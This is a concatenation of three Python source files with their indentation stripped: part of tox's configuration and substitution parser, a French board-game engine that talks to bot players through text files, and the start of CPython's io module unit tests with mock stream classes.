no_fallback = name in (config.provision_tox_env,)
res = reader.getstring(
env_attr.name, env_attr.default, replace=replace, no_fallback=no_fallback,
)
elif atype == "space-separated-list":
res = reader.getlist(env_attr.name, sep=" ")
elif atype == "line-list":
res = reader.getlist(env_attr.name, sep="\n")
elif atype == "env-list":
res = reader.getstring(env_attr.name, replace=False)
res = tuple(_split_env(res))
else:
raise ValueError("unknown type {!r}".format(atype))
if env_attr.postprocess:
res = env_attr.postprocess(testenv_config=tc, value=res)
except tox.exception.MissingSubstitution as e:
tc._missing_subs.append(e.name)
res = e.FLAG
setattr(tc, env_attr.name, res)
if atype in ("path", "string", "basepython"):
reader.addsubstitutions(**{env_attr.name: res})
return tc
def _getallenvs(self, reader, extra_env_list=None):
extra_env_list = extra_env_list or []
env_str = reader.getstring("envlist", replace=False)
env_list = _split_env(env_str)
for env in extra_env_list:
if env not in env_list:
env_list.append(env)
all_envs = OrderedDict((i, None) for i in env_list)
for section in self._cfg:
if section.name.startswith(testenvprefix):
all_envs[section.name[len(testenvprefix) :]] = None
if not all_envs:
all_envs["python"] = None
return list(all_envs.keys())
def _getenvdata(self, reader, config):
from_option = self.config.option.env
from_environ = os.environ.get("TOXENV")
from_config = reader.getstring("envlist", replace=False)
env_list = []
envlist_explicit = False
if (from_option and "ALL" in from_option) or (
not from_option and from_environ and "ALL" in from_environ.split(",")
):
all_envs = self._getallenvs(reader)
else:
candidates = (
(os.environ.get(PARALLEL_ENV_VAR_KEY_PRIVATE), True),
(from_option, True),
(from_environ, True),
("py" if self.config.option.devenv is not None else None, False),
(from_config, False),
)
env_str, envlist_explicit = next(((i, e) for i, e in candidates if i), ([], False))
env_list = _split_env(env_str)
all_envs = self._getallenvs(reader, env_list)
if not env_list:
env_list = all_envs
package_env = config.isolated_build_env
if config.isolated_build is True and package_env in all_envs:
all_envs.remove(package_env)
if config.isolated_build is True and package_env in env_list:
msg = "isolated_build_env {} cannot be part of envlist".format(package_env)
raise tox.exception.ConfigError(msg)
return env_list, all_envs, _split_env(from_config), envlist_explicit
@staticmethod
def expand_section_names(config):
"""Generative section names.
Allow writing section as [testenv:py{36,37}-cov]
The parser will see it as two different sections: [testenv:py36-cov], [testenv:py37-cov]
"""
factor_re = re.compile(r"\{\s*([\w\s,]+)\s*\}")
split_re = re.compile(r"\s*,\s*")
to_remove = set()
for section in list(config.sections):
split_section = factor_re.split(section)
for parts in itertools.product(*map(split_re.split, split_section)):
section_name = "".join(parts)
if section_name not in config.sections:
config.sections[section_name] = config.sections[section]
to_remove.add(section)
for section in to_remove:
del config.sections[section]
def _split_env(env):
"""if handed a list, action="append" was used for -e """
if env is None:
return []
if not isinstance(env, list):
env = [e.split("#", 1)[0].strip() for e in env.split("\n")]
env = ",".join([e for e in env if e])
env = [env]
return mapcat(_expand_envstr, env)
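# Illustrative expansions (assuming the usual generative envlist syntax):
#   _split_env("py36,py37")        -> ["py36", "py37"]
#   _split_env("py{36,37}-django") -> ["py36-django", "py37-django"]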
def _is_negated_factor(factor):
return factor.startswith("!")
def _base_factor_name(factor):
return factor[1:] if _is_negated_factor(factor) else factor
def _split_factor_expr(expr):
def split_single(e):
raw = e.split("-")
included = {_base_factor_name(factor) for factor in raw if not _is_negated_factor(factor)}
excluded = {_base_factor_name(factor) for factor in raw if _is_negated_factor(factor)}
return included, excluded
partial_envs = _expand_envstr(expr)
return [split_single(e) for e in partial_envs]
def _split_factor_expr_all(expr):
partial_envs = _expand_envstr(expr)
return [{_base_factor_name(factor) for factor in e.split("-")} for e in partial_envs]
def _expand_envstr(envstr):
# split by commas not in groups
tokens = _ENVSTR_SPLIT_PATTERN.split(envstr)
envlist = ["".join(g).strip() for k, g in itertools.groupby(tokens, key=bool) if k]
def expand(env):
tokens = _ENVSTR_EXPAND_PATTERN.split(env)
parts = [_WHITESPACE_PATTERN.sub("", token).split(",") for token in tokens]
return ["".join(variant) for variant in itertools.product(*parts)]
return mapcat(expand, envlist)
def mapcat(f, seq):
return list(itertools.chain.from_iterable(map(f, seq)))
class DepConfig:
def __init__(self, name, indexserver=None):
self.name = name
self.indexserver = indexserver
def __repr__(self):
if self.indexserver:
if self.indexserver.name == "default":
return self.name
return ":{}:{}".format(self.indexserver.name, self.name)
return str(self.name)
class IndexServerConfig:
def __init__(self, name, url=None):
self.name = name
self.url = url
def __repr__(self):
return "IndexServerConfig(name={}, url={})".format(self.name, self.url)
is_section_substitution = re.compile(r"{\[[^{}\s]+\]\S+?}").match
# Check value matches substitution form of referencing value from other section.
# E.g. {[base]commands}
class SectionReader:
def __init__(self, section_name, cfgparser, fallbacksections=None, factors=(), prefix=None):
if prefix is None:
self.section_name = section_name
else:
self.section_name = "{}:{}".format(prefix, section_name)
self._cfg = cfgparser
self.fallbacksections = fallbacksections or []
self.factors = factors
self._subs = {}
self._subststack = []
self._setenv = None
def get_environ_value(self, name):
if self._setenv is None:
return os.environ.get(name)
return self._setenv.get(name)
def addsubstitutions(self, _posargs=None, **kw):
self._subs.update(kw)
if _posargs:
self.posargs = _posargs
def getpath(self, name, defaultpath, replace=True):
path = self.getstring(name, defaultpath, replace=replace)
if path is not None:
toxinidir = self._subs["toxinidir"]
return toxinidir.join(path, abs=True)
def getlist(self, name, sep="\n"):
s = self.getstring(name, None)
if s is None:
return []
return [x.strip() for x in s.split(sep) if x.strip()]
def getdict(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace)
return self._getdict(value, default=default, sep=sep, replace=replace)
def getdict_setenv(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace, crossonly=True)
definitions = self._getdict(value, default=default, sep=sep, replace=replace)
self._setenv = SetenvDict(definitions, reader=self)
return self._setenv
def _getdict(self, value, default, sep, replace=True):
if value is None or not replace:
return default or {}
d = {}
for line in value.split(sep):
if line.strip():
name, rest = line.split("=", 1)
d[name.strip()] = rest.strip()
return d
def getfloat(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, float):
try:
s = float(s)
except ValueError:
raise tox.exception.ConfigError("{}: invalid float {!r}".format(name, s))
return s
def getbool(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, bool):
if s.lower() == "true":
s = True
elif s.lower() == "false":
s = False
else:
raise tox.exception.ConfigError(
"{}: boolean value {!r} needs to be 'True' or 'False'".format(name, s),
)
return s
def getargvlist(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
return _ArgvlistReader.getargvlist(self, s, replace=replace)
def getargv(self, name, default="", replace=True):
return self.getargvlist(name, default, replace=replace)[0]
def getstring(self, name, default=None, replace=True, crossonly=False, no_fallback=False):
x = None
sections = [self.section_name] + ([] if no_fallback else self.fallbacksections)
for s in sections:
try:
x = self._cfg[s][name]
break
except KeyError:
continue
if x is None:
x = default
else:
# Factors need to be applied before unwrapping dependencies,
# otherwise the substitution process can break. Once they are
# unwrapped, we apply factors again for the new dependencies.
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
return x
def _replace_if_needed(self, x, name, replace, crossonly):
if replace and x and hasattr(x, "replace"):
x = self._replace(x, name=name, crossonly=crossonly)
return x
def _apply_factors(self, s):
def factor_line(line):
m = _FACTOR_LINE_PATTERN.search(line)
if not m:
return line
expr, line = m.groups()
if any(
included <= self.factors and not any(x in self.factors for x in excluded)
for included, excluded in _split_factor_expr(expr)
):
return line
lines = s.strip().splitlines()
return "\n".join(filter(None, map(factor_line, lines)))
def _replace(self, value, name=None, section_name=None, crossonly=False):
if "{" not in value:
return value
section_name = section_name if section_name else self.section_name
self._subststack.append((section_name, name))
try:
replaced = Replacer(self, crossonly=crossonly).do_replace(value)
assert self._subststack.pop() == (section_name, name)
except tox.exception.MissingSubstitution:
if not section_name.startswith(testenvprefix):
raise tox.exception.ConfigError(
"substitution env:{!r}: unknown or recursive definition in"
" section {!r}.".format(value, section_name),
)
raise
return replaced
class Replacer:
RE_ITEM_REF = re.compile(
r"""
(?<!\\)[{]
(?:(?P<sub_type>[^[:{}]+):)? # optional sub_type for special rules
(?P<substitution_value>(?:\[[^,{}]*\])?[^:,{}]*) # substitution key
(?::(?P<default_value>[^{}]*))? # default value
[}]
""",
re.VERBOSE,
)
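# Illustrative matches for RE_ITEM_REF (forms commonly seen in a tox.ini):
#   {toxinidir}       -> substitution_value="toxinidir"
#   {env:HOME:/tmp}   -> sub_type="env", substitution_value="HOME", default_value="/tmp"
#   {[base]commands}  -> substitution_value="[base]commands" (cross-section reference)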
def __init__(self, reader, crossonly=False):
self.reader = reader
self.crossonly = crossonly
def do_replace(self, value):
"""
Recursively expand substitutions starting from the innermost expression
"""
def substitute_once(x):
return self.RE_ITEM_REF.sub(self._replace_match, x)
expanded = substitute_once(value)
while expanded != value: # substitution found
value = expanded
expanded = substitute_once(value)
return expanded
def _replace_match(self, match):
g = match.groupdict()
sub_value = g["substitution_value"]
if self.crossonly:
if sub_value.startswith("["):
return self._substitute_from_other_section(sub_value)
# in crossonly we return all other hits verbatim
start, end = match.span()
return match.string[start:end]
# special case: all match groups empty (e.g. "{:}") means os.pathsep
if not any(g.values()):
return os.pathsep
# special case: opts and packages. Leave {opts} and
# {packages} intact, they are replaced manually in
# _venv.VirtualEnv.run_install_command.
if sub_value in ("opts", "packages"):
return "{{{}}}".format(sub_value)
try:
sub_type = g["sub_type"]
except KeyError:
raise tox.exception.ConfigError(
"Malformed substitution; no substitution type provided",
)
if sub_type == "env":
return self._replace_env(match)
if sub_type == "tty":
if is_interactive():
return match.group("substitution_value")
return match.group("default_value")
if sub_type is not None:
raise tox.exception.ConfigError(
"No support for the {} substitution type".format(sub_type),
)
return self._replace_substitution(match)
def _replace_env(self, match):
key = match.group("substitution_value")
if not key:
raise tox.exception.ConfigError("env: requires an environment variable name")
default = match.group("default_value")
value = self.reader.get_environ_value(key)
if value is not None:
return value
if default is not None:
return default
raise tox.exception.MissingSubstitution(key)
def _substitute_from_other_section(self, key):
if key.startswith("[") and "]" in key:
i = key.find("]")
section, item = key[1:i], key[i + 1 :]
cfg = self.reader._cfg
if section in cfg and item in cfg[section]:
if (section, item) in self.reader._subststack:
raise ValueError(
"{} already in {}".format((section, item), self.reader._subststack),
)
x = str(cfg[section][item])
return self.reader._replace(
x, name=item, section_name=section, crossonly=self.crossonly,
)
raise tox.exception.ConfigError("substitution key {!r} not found".format(key))
def _replace_substitution(self, match):
sub_key = match.group("substitution_value")
val = self.reader._subs.get(sub_key, None)
if val is None:
val = self._substitute_from_other_section(sub_key)
if callable(val):
val = val()
return str(val)
def is_interactive():
return sys.stdin.isatty()
class _ArgvlistReader:
@classmethod
def getargvlist(cls, reader, value, replace=True):
"""Parse ``commands`` argvlist multiline string.
:param SectionReader reader: reader to be used.
:param str value: Content stored by key.
:rtype: list[list[str]]
:raise :class:`tox.exception.ConfigError`:
line-continuation ends nowhere while resolving for specified section
"""
commands = []
current_command = ""
for line in value.splitlines():
line = line.rstrip()
if not line:
continue
if line.endswith("\\"):
current_command += " {}".format(line[:-1])
continue
current_command += line
if is_section_substitution(current_command):
replaced = reader._replace(current_command, crossonly=True)
commands.extend(cls.getargvlist(reader, replaced))
else:
commands.append(cls.processcommand(reader, current_command, replace))
current_command = ""
else:
if current_command:
raise tox.exception.ConfigError(
"line-continuation ends nowhere while resolving for [{}] {}".format(
reader.section_name, "commands",
),
)
return commands
@classmethod
def processcommand(cls, reader, command, replace=True):
posargs = getattr(reader, "posargs", "")
if sys.platform.startswith("win"):
posargs_string = list2cmdline([x for x in posargs if x])
else:
posargs_string = " ".join([shlex_quote(x) for x in posargs if x])
# Iterate through each word of the command substituting as
# appropriate to construct the new command string. This
# string is then broken up into exec argv components using
# shlex.
if replace:
newcommand = ""
for word in CommandParser(command).words():
if word == "{posargs}" or word == "[]":
newcommand += posargs_string
continue
elif word.startswith("{posargs:") and word.endswith("}"):
if posargs:
newcommand += posargs_string
continue
else:
word = word[9:-1]
new_arg = ""
new_word = reader._replace(word)
# replace a second time to resolve substitutions introduced by the first pass
new_word = reader._replace(new_word)
new_word = new_word.replace("\\{", "{").replace("\\}", "}")
new_arg += new_word
newcommand += new_arg
else:
newcommand = command
# Construct shlex object that will not escape any values,
# use all values as is in argv.
shlexer = shlex.shlex(newcommand, posix=True)
shlexer.whitespace_split = True
shlexer.escape = ""
return list(shlexer)
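# The shlex tokenizer is configured with escape="" so backslashes are kept
# verbatim, which keeps e.g. Windows paths intact during argv splitting.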
class CommandParser(object):
class State(object):
def __init__(self):
self.word = ""
self.depth = 0
self.yield_words = []
def __init__(self, command):
self.command = command
def words(self):
ps = CommandParser.State()
def word_has_ended():
return (
(
cur_char in string.whitespace
and ps.word
and ps.word[-1] not in string.whitespace
)
or (cur_char == "{" and ps.depth == 0 and not ps.word.endswith("\\"))
or (ps.depth == 0 and ps.word and ps.word[-1] == "}")
or (cur_char not in string.whitespace and ps.word and ps.word.strip() == "")
)
def yield_this_word():
yieldword = ps.word
ps.word = ""
if yieldword:
ps.yield_words.append(yieldword)
def yield_if_word_ended():
if word_has_ended():
yield_this_word()
def accumulate():
ps.word += cur_char
def push_substitution():
ps.depth += 1
def pop_substitution():
ps.depth -= 1
for cur_char in self.command:
if cur_char in string.whitespace:
if ps.depth == 0:
yield_if_word_ended()
accumulate()
elif cur_char == "{":
yield_if_word_ended()
accumulate()
push_substitution()
elif cur_char == "}":
accumulate()
pop_substitution()
else:
yield_if_word_ended()
accumulate()
if ps.word.strip():
yield_this_word()
return ps.yield_words
def getcontextname():
if any(env in os.environ for env in ["JENKINS_URL", "HUDSON_URL"]):
return "jenkins"
return None
|
exo1.py
|
from random import shuffle,randrange
from time import sleep
from threading import Thread
import dummy0, dummy1
latence = 0.001
permanents, deux, avant, apres = {'rose'}, {'rouge','gris','bleu'}, {'violet','marron'}, {'noir','blanc'}
couleurs = avant | permanents | apres | deux
passages = [{1,4},{0,2},{1,3},{2,7},{0,5,8},{4,6},{5,7},{3,6,9},{4,9},{7,8}]
pass_ext = [{1,4},{0,2,5,7},{1,3,6},{2,7},{0,5,8,9},{4,6,1,8},{5,7,2,9},{3,6,9,1},{4,9,5},{7,8,4,6}]
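# passages: adjacency sets for the 10 rooms of the board; pass_ext adds the
# extra corridors that only the pink character ('rose') may use (see bouger).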
def message(texte,jos):
for j in jos:
f = open("./"+str(j.numero)+"/infos.txt","a")
f.write(texte + "\n")
f.close()
def informer(texte):
message(texte,joueurs)
def demander(q,j):
informer("QUESTION : "+q)
f = open("./"+str(j.numero)+"/questions"+".txt","w")
f.write(q)
f.close()
sleep(latence)
f = open("./"+str(j.numero)+"/reponses"+".txt","r")
r = f.read()
f.close()
informer("REPONSE DONNEE : "+r)
return r
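# demander() implements the file-based protocol with the bot processes:
# the question is logged to every player's infos.txt, written to
# ./<numero>/questions.txt, and after a short latency the answer is read
# back from ./<numero>/reponses.txt.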
class personnage:
def __init__(self,couleur):
self.couleur, self.suspect, self.position, self.pouvoir = couleur, True, 0, True
def __repr__(self):
susp = "-suspect" if self.suspect else "-clean"
return self.couleur + "-" + str(self.position) + susp
class joueur:
def __init__(self,n):
self.numero = n
self.role = "l'inspecteur" if n == 0 else "le fantome"
def jouer(self,party):
informer("****\n Tour de "+self.role)
p = self.selectionner(party.tuiles_actives)
avec = self.activer_pouvoir(p,party,avant|deux)
self.bouger(p,avec,party.bloque)
self.activer_pouvoir(p,party,apres|deux)
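# One turn: pick one of the available tiles, optionally trigger a
# before-move power (avant|deux), move, then optionally trigger an
# after-move power (apres|deux).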
def selectionner(self,t):
w = demander("Tuiles disponibles : " + str(t) + " choisir entre 0 et " + str(len(t)-1),self)
i = int(w) if w.isnumeric() and int(w) in range(len(t)) else 0
p = t[i]
informer("REPONSE INTERPRETEE : "+str(p))
informer(self.role + " joue " + p.couleur)
del t[i]
return p
def activer_pouvoir(self,p,party,activables):
if p.pouvoir and p.couleur in activables:
a = demander("Voulez-vous activer le pouvoir (0/1) ?",self) == "1"
informer("REPONSE INTERPRETEE : "+str(a==1))
if a :
informer("Pouvoir de " + p.couleur + " activé")
p.pouvoir = False
if p.couleur == "rouge":
draw = party.cartes[0]
informer(str(draw) + " a été tiré")
if draw == "fantome":
party.start += -1 if self.numero == 0 else 1
elif self.numero == 0:
draw.suspect = False
del party.cartes[0]
if p.couleur == "noir":
for q in party.personnages:
if q.position in {x for x in passages[p.position] if x not in party.bloque or q.position not in party.bloque} :
q.position = p.position
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "blanc":
for q in party.personnages:
if q.position == p.position and p != q:
dispo = {x for x in passages[p.position] if x not in party.bloque or q.position not in party.bloque}
w = demander(str(q) + ", positions disponibles : " + str(dispo) + ", choisir la valeur",self)
x = int(w) if w.isnumeric() and int(w) in dispo else dispo.pop()
informer("REPONSE INTERPRETEE : "+str(x))
q.position = x
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "violet":
informer("Rappel des positions :\n" + str(party))
co = demander("Avec quelle couleur échanger (pas violet!) ?",self)
if co not in couleurs:
co = "rose"
informer("REPONSE INTERPRETEE : "+co)
q = [x for x in party.personnages if x.couleur == co][0]
p.position, q.position = q.position, p.position
informer("NOUVEAU PLACEMENT : "+str(p))
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "marron":
return [q for q in party.personnages if p.position == q.position]
if p.couleur == "gris":
w = demander("Quelle salle obscurcir ? (0-9)",self)
party.shadow = int(w) if w.isnumeric() and int(w) in range(10) else 0
informer("REPONSE INTERPRETEE : "+str(party.shadow))
if p.couleur == "bleu":
w = demander("Quelle salle bloquer ? (0-9)",self)
x = int(w) if w.isnumeric() and int(w) in range(10) else 0
w = demander("Quelle sortie ? Chosir parmi : "+str(passages[x]),self)
y = int(w) if w.isnumeric() and int(w) in passages[x] else passages[x].copy().pop()
informer("REPONSE INTERPRETEE : "+str({x,y}))
party.bloque = {x,y}
return [p]
def bouger(self,p,avec,bloque):
pass_act = pass_ext if p.couleur == 'rose' else passages
if p.couleur != 'violet' or p.pouvoir:
disp = {x for x in pass_act[p.position] if p.position not in bloque or x not in bloque}
w = demander("positions disponibles : " + str(disp) + ", choisir la valeur",self)
x = int(w) if w.isnumeric() and int(w) in disp else disp.pop()
informer("REPONSE INTERPRETEE : "+str(x))
for q in avec:
q.position = x
informer("NOUVEAU PLACEMENT : "+str(q))
class partie:
def __init__(self,joueurs):
for i in [0,1]:
f = open("./"+str(i)+"/infos"+".txt","w")
f.write("")
f.close()
self.joueurs = joueurs
self.start, self.end, self.num_tour, self.shadow, x = 4, 22, 1, randrange(10), randrange(10)
self.bloque = {x,passages[x].copy().pop()}
self.personnages = {personnage(c) for c in couleurs}
self.tuiles = [p for p in self.personnages]
self.cartes = self.tuiles[:]
self.fantome = self.cartes[randrange(8)]
message("!!! Le fantôme est : "+self.fantome.couleur,[self.joueurs[0]])
self.cartes.remove(self.fantome)
self.cartes += ['fantome']*3
shuffle(self.tuiles)
shuffle(self.cartes)
for i,p in enumerate(self.tuiles):
p.position = i
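# After shuffling, the eight characters start in rooms 0-7 (rooms 8 and 9
# begin empty); self.bloque holds the two rooms whose connecting corridor
# is blocked.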
def actions(self):
joueur_actif = self.num_tour % 2
if joueur_actif == 1:
shuffle(self.tuiles)
self.tuiles_actives = self.tuiles[:4]
else:
self.tuiles_actives = self.tuiles[4:]
for i in [joueur_actif,1-joueur_actif,1-joueur_actif,joueur_actif]:
self.joueurs[i].jouer(self)
def lumiere(self):
partition = [{p for p in self.personnages if p.position == i} for i in range(10)]
if len(partition[self.fantome.position]) == 1 or self.fantome.position == self.shadow:
informer("le fantome frappe")
self.start += 1
for piece,gens in enumerate(partition):
if len(gens) > 1 and piece != self.shadow:
for p in gens:
p.suspect = False
else:
informer("pas de cri")
for piece,gens in enumerate(partition):
if len(gens) == 1 or piece == self.shadow:
for p in gens:
p.suspect = False
self.start += len([p for p in self.personnages if p.suspect])
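# lumiere(): if the ghost is alone or hidden in the shadowed room it
# "screams" (the score advances and grouped characters outside the shadow
# are cleared of suspicion); otherwise isolated or shadowed characters are
# cleared. The score then advances by the number of remaining suspects.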
def tour(self):
informer("**************************\n" + str(self))
self.actions()
self.lumiere()
for p in self.personnages:
p.pouvoir = True
self.num_tour += 1
def lancer(self):
while self.start < self.end and len([p for p in self.personnages if p.suspect]) > 1:
self.tour()
informer("L'enquêteur a trouvé - c'était " + str(self.fantome) if self.start < self.end else "Le fantôme a gagné")
informer("Score final : "+str(self.end-self.start))
return self.end-self.start
def __repr__(self):
return "Tour:" + str(self.num_tour) + ", Score:"+str(self.start)+"/"+str(self.end) + ", Ombre:" + str(self.shadow) + ", Bloque:" + str(self.bloque) +"\n" + " ".join([str(p) for p in self.personnages])
score = []
joueurs = [joueur(0),joueur(1)]
nbparties = 1000
for i in range(nbparties):
t1,t2 = Thread(target=dummy0.lancer), Thread(target=dummy1.lancer)
t1.start()
t2.start()
score.append(partie(joueurs).lancer())
t1.join()
t2.join()
victoires = [x for x in score if x<=0]
print("Efficacité : "+str(len(victoires)/nbparties*100)+"%")
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
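# A None entry in _read_stack is consumed by readinto() and makes it return
# None, simulating a raw stream that currently has no data available
# (a would-block condition).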
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
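# write() semantics: with a blocker char armed, data before its first
# occurrence is written as a partial write (its length is returned); if the
# blocker is the very first byte, the blocker is disarmed and None is
# returned to signal "would block". Without a blocker the full buffer is
# accepted.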
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
